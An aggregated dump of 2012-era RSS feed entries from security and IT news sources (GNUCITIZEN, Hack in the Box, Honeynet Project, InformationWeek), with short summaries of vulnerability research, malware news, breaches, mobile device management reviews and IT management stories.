http://www.gnucitizen.org/feed/ I’ve been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me, that’s hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late. I’ve been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. [...]

==> CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

http://www.gnucitizen.org/feed/ I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). [...]

==> Hacking Linksys IP Cameras (pt 5)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]

==> Breaking Into a Home With an iPhone

http://www.gnucitizen.org/feed/ This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]

==> Extensions at War

http://www.gnucitizen.org/feed/ Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why. [...]

==> Exploit Sweatshop

http://www.gnucitizen.org/feed/ When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money. Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]

==> Jeriko Group and Source Code Repository

http://www.gnucitizen.org/feed/ Jeriko moved in its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavily lifting and also introduces some funky programming mechanisms. [...]

==> Hacking Linksys IP Cameras (pt 4)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS. [...]

==> Hacking Linksys IP Cameras (pt 3)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2). Unlike the previous two vulnerabilities I released, the vulnerabilities I’m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. [...]

==> John McAfee to Be Released, Accuses Vice Magazine of Involvement in His Arrest

http://www.hackinthebox.org/backend.php http://www.wired.com/images_blogs/threatlevel/2012/11/mcafee-new-finke.jpg The John McAfee story continues with more drama. According to a post published on his blog, the antivirus software pioneer will be released from detention after a Guatemalan judge has determined that his arrest was illegal. Furthermore, his representatives believe that he will be allowed to return to the US as he wanted. Tags: McAfeeLaw and Order

==> Security Firm Identifies First Fake Installer Trojan for Macs

http://www.hackinthebox.org/backend.php http://i1-news.softpedia-static.com/images/news-700/Security-Firm-Identifies-First-Fake-Installer-Trojan-for-Macs.png?1355302240 Fake installers have been around for quite some time now, but so far, theyve only targeted Windows users. Now, researchers from security firm Doctor Web have identified a variant thats designed for Mac OS X. Dubbed Trojan.SMSSend.3666, the malicious element disguises itself as an installer for a popular application called VKMusic 4 an app that allows users to listen to music on a Russian social media site. During the installation process, victims are asked to provide their mobile phone numbers. Then, theyre requested to enter a code received via SMS. Tags: OS XAppleViruses & Malware

==> BlackBerry 10 Gold SDKs now available for developers

http://www.hackinthebox.org/backend.php http://cdn.crackberry.com/sites/crackberry.com/files/u10880/blackberry-10-dev-alpha-31.jpg Research In Motion (RIM) (NASDAQ: RIMM)(TSX: RIM) today released the "gold" build of the BlackBerry 10 developer toolkit. The "gold" build includes all of the final tools, components, and APIs that will enable developers to create integrated, social and beautiful applications for BlackBerry 10, and have the confidence that their apps will delight customers at launch. Tags: BlackBerryRIMSoftware-Programming

==> Coming in Ubuntu Linux 13.04: instant purchases from the desktop

http://www.hackinthebox.org/backend.php http://zapt4.staticworld.net/images/article/2012/09/ubuntu20stacked20log-100005231-large.jpg Canonical may not have published an official alpha release for its core Ubuntu Linux 13.04 OS last weekor a corresponding list of new featuresbut on Friday the company did reveal some specifics about what's coming in this next version of its popular Linux distribution. In fact, Cristian Parrino, Canonical's vice president of online services, outlined three key new features in a post on the Canonical blog. Tags: UbuntuLinux

==> Intel next-gen Haswell CPU line-up leaked, Core i7-4770K the flagship

http://www.hackinthebox.org/backend.php http://www.neowin.net/images/uploaded/haswell_cpu_lineup.jpg VR-Zone has managed to get their hands on the line-up for Intel's upcoming 22nm Haswell desktop processors, revealing that there will be initially 14 CPUs across the Core i7 and Core i5 brands. These processors will be utilizing a brand new CPU socket - LGA 1150 - on Lynx Point chipset motherboards, and are split into six standard power SKUs and eight low power SKUs. Tags: IntelIndustry News

==> ISO 27001 is the litmus test for information security

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/javaconsultindo/5914569530/in/photostream With increasing reliance on collaboration tools to improve information management in regulated industries -- such as financial services, healthcare and construction -- organizations must demand the highest levels of security from their external service providers in order to avoid data breaches and other incidents. Focusing on the physical data center that hosts the online collaboration service providers application isnt enough. Tags: SecurityIndustry News

==> Deploying DLP technology requires hands-on approach, experts say

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/puifonluong/6823761081/ About a year and a half ago, Mark Jackson, the information security officer at San Rafael, Calif.-based Westamerica Bank, began researching data loss prevention products for the regional community bank. His search began after a Department of Financial Institutions auditor recommended the technology as a way for Westamerica Bank to manage insider threats. Tags: Security

==> Researchers warn of bulk WordPress and Joomla exploit tool serving fake antivirus malware to users

http://www.hackinthebox.org/backend.php http://cdn.thenextweb.com/wp-content/blogs.dir/1/files/2012/12/959117_95964901-645x250.jpg WordPress and Joomla exploits have existed for years, and cybercriminals have thus been exploiting them for a long time. Yet the situation may have gotten slightly more serious as of late, as there appears to be a bulk exploit tool being used in the wild, targeting sites running both popular content management systems, and having them serve up fake antivirus malware to visitors. Tags: SecurityViruses & Malware

==> The fallacy of wireless power

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/vishay/6186787567/ They're back -- wireless chargers, that is. If you believe the hype in the product blogs and from some consulting firms, by 2016 you'll have them nearly everywhere: hotel rooms, conference rooms, airports, lobbies, cafs, and on your desks and entryway tables. I'm not so sure. Despite years of vendor attempts, the fairly old technology underneath wireless charging -- inductive charging -- has simply failed to take root in computing devices. Tags: Technology

==> Garage door opener using Siri and Raspberry Pi

http://www.hackinthebox.org/backend.php http://hackadaycom.files.wordpress.com/2012/12/screenshot-from-2012-12-11-095436.png?w=580&h=378 [DarkTherapy] wrote in to tell us about his garage door opener that works with Siri and a Raspberry Pi. Its pretty hard to find a picture that tells the story of the hack, but here you can see the PCB inside the housing of the garage door opener. He patched the grey wires into the terminal block. On the other end they connect to a relay which makes the connection. Tags: RaspberryPiHardwareApple

==> Best Gaming CPUs For The Money: December 2012

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Central_processing_unit This month we discuss two new CPUs, Intel's Core i7-3970X and AMD's Athlon II X4 651K, neither of which gamers are going to get particularly excited about. We also discuss the disappearance of the Pentium G2120, along with a handful of price changes. If you dont have the time to research benchmarks, or if you dont feel confident enough in your ability to pick the right processor for your next gaming machine, fear not. We at Toms Hardware have come to your aid with a simple list of the best gaming CPUs offered for the money. Tags: HardwareGamesIntelAMD

==> Malicious QR codes pop up on traffic-heavy locations

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/QR_code Cybercrooks are putting up stickers featuring URLs embedded in Quick Response codes (QR codes) as a trick designed to drive traffic to dodgy sites. QR codes are two-dimensional matrix barcode that can be scanned by smartphones that link users directly to a website without having to type in its address. By using QR codes (rather than links) as a jump-off point to dodgy sites, cybercrooks can disguise the ultimate destination of links. Tags: Security

==> FTC re-slams apps for kids over privacy concerns

http://www.hackinthebox.org/backend.php http://asset3.cbsistatic.com/cnwk.1d/i/tim/2012/12/10/ftc.jpg In February, 2012 the Federal Trade Commission (FTC) issued a report titled Mobile Apps for Kids: Current Privacy Disclosures are Disappointing (PDF) that pointed out that there was "little or no" privacy information available to parents in the Android Google Play and Apple iOS app stores prior to download and scarce data in the apps themselves or on the app vendors websites. Tags: FTCPrivacy

==> GhostShell claims breach of 1.6M accounts at FBI, NASA, and more

http://www.hackinthebox.org/backend.php http://cdn-static.zdnet.com/i/story/70/00/008558/team-ghostshell-takes-on-nasa-esa-pentagon.png Hacktivist campaigners Team GhostShell claim to have stolen accounts from a number of organisations including NASA, ESA, the Pentagon and the Federal Reserve. Tags: SecurityHackers

==> Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

http://www.hackinthebox.org/backend.php http://www.wired.com/images_blogs/threatlevel/2012/12/Transit-CCTV-camera.jpg Transit authorities in cities across the country are quietly installing microphone-enabled surveillance systems on public buses that would give them the ability to record and store private conversations, according to documents obtained by a news outlet. The systems are being installed in San Francisco, Baltimore, and other cities with funding from the Department of Homeland Security in some cases, according to the Daily, which obtained copies of contracts, procurement requests, specs and other documents. Tags: Privacy

==> 8 biggest myths about managing geeks

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/nivlek_est/319151015/ From Sheldon Cooper on "The Big Bang Theory" to Comic Book Guy from "The Simpsons" to Urkel, we know all we need to know about geeks, right? They eat nothing but pizza and care about nothing but technology. They live by night and are rarely seen in daylight. They're barely able to communicate with other bipeds. They'd spend all day playing with their toys and getting nada done if you let them. They're the antithesis of creative. Tags: Industry News

==> UK Chapter Annual Status Report 2011/2012

http://www.honeynet.org/rss.xml The UK Chapter's annual status report for 2011/2012 has been published at http://www.ukhoneynet.org/2012/12/04/uk-honeynet-project-chapter-annual-status-report-for-20112012/.

==> ENISA publishes report on honeypots

http://www.honeynet.org/rss.xml ENISA (The European Network and Information Security Agency) under the leadership of CERT Polska has published report on honeypots. Its a hands-on guide on the various honeypot technologies out there looking at various operational aspects, such as extensibility, reliability, ease of deployment, etc. If you are considering running a honeypot, this is a must read! Check it out at http://www.enisa.europa.eu/media/press-releases/new-report-by-eu-agency-enisa-on-digital-trap-honeypots-to-detect-cyber-attacks. Great job, ENISA!

==> Press Release: 2013 Honeynet Project Workshop

http://www.honeynet.org/rss.xml THE HONEYNET PROJECT Contact: Christian Seifert Phone: +1-206-2651944 1425 Broadway #438 Seattle, WA, 98122 FOR IMMEDIATE RELEASE 9 A.M. GST, November 26th, 2012 2013 HONEYNET PROJECT ANNUAL WORKSHOP 10-12 FEBRUARY 2013 IN DUBAI, UAE DUBAI, 26 NOV 2012: This three-day event features an exceptional collection of international security professionals presenting the latest research tools and findings in malware analysis. The twelfth annual workshop will be held at The Address Dubai Mall Hotel on the 10th through 12th of February, 2013, with sponsorship and support from the UAE Honeynet Project chapter, United Arab Emirates Computer Emergency Response Team (aeCERT), and the Pakistan Honeynet Project chapter. The workshop includes one full day of briefings and two full days of hands-on tutorial trainings. Founded in 1999, The Honeynet Project is a non-profit international research organization dedicated to improving the security of the Internet at no cost to the public. Cyber security is a critical element for any nation working towards technical advancement, said H.E. Mohamed Nasser Al Ghanim, Director General of TRA. I am pleased the TRA and aeCERT are participating in this event; hands-on and knowledge-intensive workshops such as this are invaluable as we work towards reinforcing the nations cyber security. Cyber security is not a one-man job, it is dependent on the proactive collaboration of groups spanning government, industry and academia, said Ahmad Alajail, Security Intelligence & Threat Analyst. This is why initiatives such as Honeynet, which provide a diverse talent base, are greatly complementary to the nations cyber security and to our work at aeCERT. The Honeynet Project is composed of 45 regional chapters and is a diverse, talented, and engaged group of hundreds of volunteer security experts who conduct open, cross disciplinary research and development into the evolving threat landscape. Registration and more information available at: http://dubai2013.honeynet.org or by contacting The Honeynet Project CEO Christian Seifert to request a personal interview at: christian.seifert@honeynet.org. -End-

==> 2013 Honeynet Project Workshop in Dubai!

http://www.honeynet.org/rss.xml The Honeynet Project is excited to announce its next workshop on Feb 10th to Feb 12 2013 in Dubai, UAE. This is going to be a three day event filled with presentations and hands-on tutorials by our members. We will cover a wide range of information security topics from virtualization security, botnets, big data, exploits to, of course, honeypots, that are followed by a set of exciting one-two day hands-on tutorials on security visualization, malware and network analysis, honeypots, log file assessment, and much more. The detailed agenda as well as instructions to register can be found at http://dubai2013.honeynet.org. We hope to see you in Dubai!

==> HP Annual Report 2012 released

http://www.honeynet.org/rss.xml Each year, the Honeynet Project summarizes its activities and activities of its members in a short annual report. You will find the annual report for fiscal year 2012 attached. Enjoy!

==> Honeynet Project completes Cyber Fast Track Project: Web Application Honeypots

http://www.honeynet.org/rss.xml We are happy to be able to announce the successful completion of The Honeynet Project's participation in DARPA's Cyber Fast Track program with our Web Application Honeypot project. Imperva's recent Web Application Attack Report shows the picture of large scale automated threats towards web applications. Adversaries are basically scanning millions of web applications for vulnerabilities every day and a single successful infection increases their army of workers and thereby their capability for doing more damage. Without a specific target, attackers can leverage automated tools and search engines excellent information aggregation service to find their victims, identify the vulnerability, and launch an attack. The majority of web application attacks target the web application's database. These - so called SQL injection attacks - manipulate the underlying database by providing user input that - due to the vulnerability in the web application - is converted into SQL statements. The main goal of this project was the development of a SQL injection vulnerability emulator that goes beyond the collection of SQL vulnerability probings. It deceives the adversary with crafted responses matching his request into sending us the malicious payload which could include all kinds of malicious code. The project is being released as open-source and installation instructions can be found on the project page. A detailed report was created as part of the project.

==> Know Your Enemy: Social Dynamics of Hacking

http://www.honeynet.org/rss.xml I am very pleased to announce the publication of another paper in our Know Your Enemy white paper series: "KYE - Social Dynamics of Hacking" authored by Thomas J. Holt and Max Kilger from our Spartan Devils Honeynet Project Chapter. In this paper, Tom and Max go to the roots of the Know Your Enemy series and shine light on the social groups that are involved in hacking. Abstract Though most information security research focuses on current threats, tools, and techniques to defeat attacks, it is vital to recognize and understand the humans behind attacks. Individual attackers have various skills, motives, and social relationships that shape their actions and the resources they target. In this paper we will explore the distribution of skill in the global hacker community, the influence of on and off-line social relationships, motivations across attackers, and the near-future of threats to improve our understanding of the hacker and attacker community.

==> GSoC 2012 Accepted Students Officially Announced

http://www.honeynet.org/rss.xml Since my last post about the Google Summer Of Code 2012 Student Applications deadline closing and sharing some initial student applications statistics, all the GSoC 2012 mentoring organisations have been hard at work reviewing and scoring their student applications.

==> Google Summer Of Code 2012 Student Applications now closed and some statistics

http://www.honeynet.org/rss.xml After a slower than usual start, this years Google Summer of Code (GSoC) student applications period closed at 19:00 UTC on Friday April 6th, with a major application rush in the last couple of days which kept us busy right up to the deadline! Many thanks to all the interested students who applied, and our mentors and org admins for taking the time to respond to students on IRC, email and through Melange.

==> Honeynet Project Security Workshop 2012 - VIDEOs posted

http://www.honeynet.org/rss.xml Folks, we had a great time at the Honeynet Project Security Workshop @ Facebook. We'd like to thank again our execellent hosts Facebook, the attendees, and our many speakers. If you were not able to attend, you can check out the videos at http://honeynet.org/SecurityWorkshops/2012_SF_Bay_Area/Mar_19/Workshop_Program_Agenda.

==> Union Pacific Opens Austin Software Development Center

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN CIO Lynden Tennison goes where the talent is to build his development team.

==> Outlook 2013: IT Is Still Too Internally Focused

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Tech spending is looking up, but IT must focus more on customers and less on internal systems.

==> San Francisco Giants' Bill Schlough: InformationWeek IT Chief Of The Year

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The Giants' CIO and his team are innovating in areas such as analytics-based scouting and in-stadium wireless, keeping the World Series champions ahead of the game.

==> Apple Mac To Be Made In USA

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Apple shareholders may not be thrilled, but Apple's decision to make some Mac computers in the U.S. will bring more jobs, training to domestic workers.

==> In MLB.com Challenge, College Students Pitch Tech Ideas

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Major League Baseball, Syracuse University partner on hackathon to give students real-world career experience and the league new ideas to engage fans.

==> Hire A Data Science Team, Not A Data Scientist

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Assembling a group of talented people with diverse skills is the best way to meet your data science needs, says Deloitte director.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> BYOD: Why Mobile Device Management Isn't Enough

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Here's what to look for in MDM software and what limitations IT still faces in letting employees use personal devices for work.

==> Good Technology MDM Review: Tight Grip On Data

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Good's on its way to data-centric security.

==> Symantec MDM Review: Familiarity A Selling Point

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Users of Symantec security software will find similar interface.

==> CIO Profiles: John Kellington Of Cincinnati Insurance

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Rip the Band-Aid off, advises this tech chief.

==> RIM MDM Review: Beyond BES, Not There Yet

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN It's not an easy option unless you're a heavy-duty BlackBerry shop.

==> Samsung Slammed Over Labor Abuses

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN New Samsung guidelines at China supplier factories are insufficient to protect workers, says labor watch group.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> 10 Cloud Computing Pioneers

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Cloud computing has rewritten decades of technology rules. Take a closer look at 10 innovators who helped make it possible.

==> HP Takes $8.8 Billion Charge On Autonomy Unit

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN HP reports bruising loss for fourth quarter, says Autonomy officials misrepresented financial position prior to 2011 acquisition.

==> Big Data Classes For CXOs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Teaching C-suite executives the fundamentals of big data, a topic once confined to the rarefied world of computer scientists, is becoming a growth industry.

==> Marketing Analytics: How To Start Without Data Scientists

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN You don't need a team of highly paid math whizzes to get started with data analytics, says one marketing analytics expert.

==> Modria's Fairness Engine: Justice On Demand

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Dispute resolution technology could replace courtroom clashes, at least when the stakes are low.

==> CIO Profiles: Anthony DeCanti Of UniGroup

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Chasing technology is a bad idea, says the CIO of this logistics services company.

==> United Flights Delayed By Computer Problems

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN One year after a merger with Continental, integrating a passenger information system causes trouble.

==> 4 Social Factors That Drive IT Buying Decisions

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN LinkedIn study finds that social networks are increasingly influential throughout the tech purchasing process.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Facebook Jobs App Takes On LinkedIn

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Facebook's new app is designed to connect job candidates with hiring employers. Should LinkedIn be worried?

==> Monster Chooses Splunk For Big Data Security

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Popular job search website looks to Splunk, rising big data star, to meet its online security and compliance goals.

==> E2 Innovate Keynoters: Set IT Free

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google CIO Ben Fried evangelizes the value of employee technology choice, while IDC's Michael Fauscette sees a future in which all enterprise systems will be social.

==> McAfee Founder Sells Rights To Life Story

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Antivirus company founder remains in Guatemalan jail awaiting deportation to Belize for questioning in a murder investigation. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Hackers Hold Australian Medical Records Ransom

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN With no offline backups available, Australian medical center must choose: pay $4,200 ransom or attempt to do business without patient records. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Google's Android Malware Detection Falls Short

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google's app verification service, introduced in Android 4.2, catches only a fifth of malware samples at best, a recent study reports. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Team Ghostshell Hackers Claim NASA, Interpol, Pentagon Breaches

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Group boasts "juicy release" of 1.6 million records and accounts drawn from defense contractors, government agencies, trade organizations and more. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Anonymous No Longer: Hacktivist Spokesman Charged

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Texas charges a self-professed Anonymous spokesman with handling stolen Stratfor credit card data; Britain convicts four people for Operation Payback DDoS attacks. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> 6 Wacky McAfee Facts: From Guatemala, With Twists

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN You can't make up stories like the one unfolding around rogue antivirus company founder John McAfee. Catch up on the latest. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Citrix Buys Zenprise: What's Next In BYOD?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Citrix's acquisition signals that standalone mobile device management vendors could become less common. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Top 10 Malware Developments Of 2012

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Among the security game-changers this year: Blackhole's business model, Flashback's Mac fetish, ransomware's resurgence and Gauss' ability to guard against analysis. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Calif. Sues Delta For App Privacy Violations

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN California attorney general opens suit after Delta ignores warnings about its nonexistent app privacy policy. This may be a small part of the airline's larger technology problems. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Royal Security Fail: 'May I Speak To Kate?'

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The oldest -- and most effective -- social engineering trick in the book remains getting on the phone and impersonating an insider. Ask Kate Middleton, the Duchess of Cambridge. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Blame Screen Size: Mobile Browsers Flunk Security Tests

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN More than 90% of mobile device browsers now in use failed safety checks, find Georgia Tech researchers. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Guatemala Arrests Rogue AV Founder McAfee

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN In a stream of blog posts from prison, McAfee details his arrest for immigration violations after fleeing Belize, where he's wanted for questioning in a murder investigation. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Swiss Spooks Warn Of Counter-Terrorism Intelligence Breach

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Swiss government suspects insider may have stolen counter-terrorism information that had been shared with Switzerland by foreign governments, including Britain and the United States. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Social Networks Continue Push For Control

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The Internet was supposed to facilitate direct connections between individuals and disempower gatekeepers. Instead, it has become a massive man-in-the-middle attack. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> 10 Financial Services Security Trends For 2013

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN DDoS attacks against major U.S. banks in September put cybersecurity back in the spotlight. Here's what the industry will do next to shore up systems. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> RIM's BlackBerry 10 To Block Certain Passwords

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN A file uncovered in early builds of BlackBerry 10 shows a list of 106 passwords that won't be allowed on RIM's new devices. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Zeus Botnet Eurograbber Steals $47 Million

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Sophisticated, targeted attack campaign enabled criminals to steal an estimated $47 million from more than 30,000 corporate and private banking customers. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Tumblr Hack: 4 Security Reminders For SMBs

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Following GNAA's defacing of several thousand Tumblr blogs, take these security reminders to heart -- especially if you use popular publishing platforms. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> New Rules For Bug Hunters In 2013

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Zero-day vulnerabilities market becoming more guarded as researchers increasingly limit public disclosure of their findings. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Better Security Through Data Mining

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Mining access logs and identity stores can provide a good picture of what's going on inside the firewall. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> McAfee, AV King Turned Fugitive, Surfaces In Guatemala

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Geotagged photo reveals location of murder suspect John McAfee, on the run from authorities in Belize. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Twitter Users Vulnerable To SMS Spoofing Attack

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Twitter vulnerability would allow attackers to post messages to targeted accounts. Similar flaw has already been addressed by Facebook and SMS payment provider Venmo. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Centrify Harnesses Active Directory For Mobile Device Management

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN DirectControl for SaaS promises convenient single sign-on to cloud apps and services for mobile users and secure, simple deployment for IT. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Ransomware Pays: FBI Updates Reveton Malware Warning

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Latest malware, trying to trick users into paying a fine, claims the FBI is using audio, video, and other devices to record computer's "illegal" activity. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Using the cloud – UK companies unaware of their data responsibility

http://www.infosecurity-magazine.com/rss/news/ The ICO published guidance on the use of cloud services and the Data Protection Act in September of this year but a new survey shows a worrying lack of awareness of either the ICOs guidance or legal responsibilities within British business.

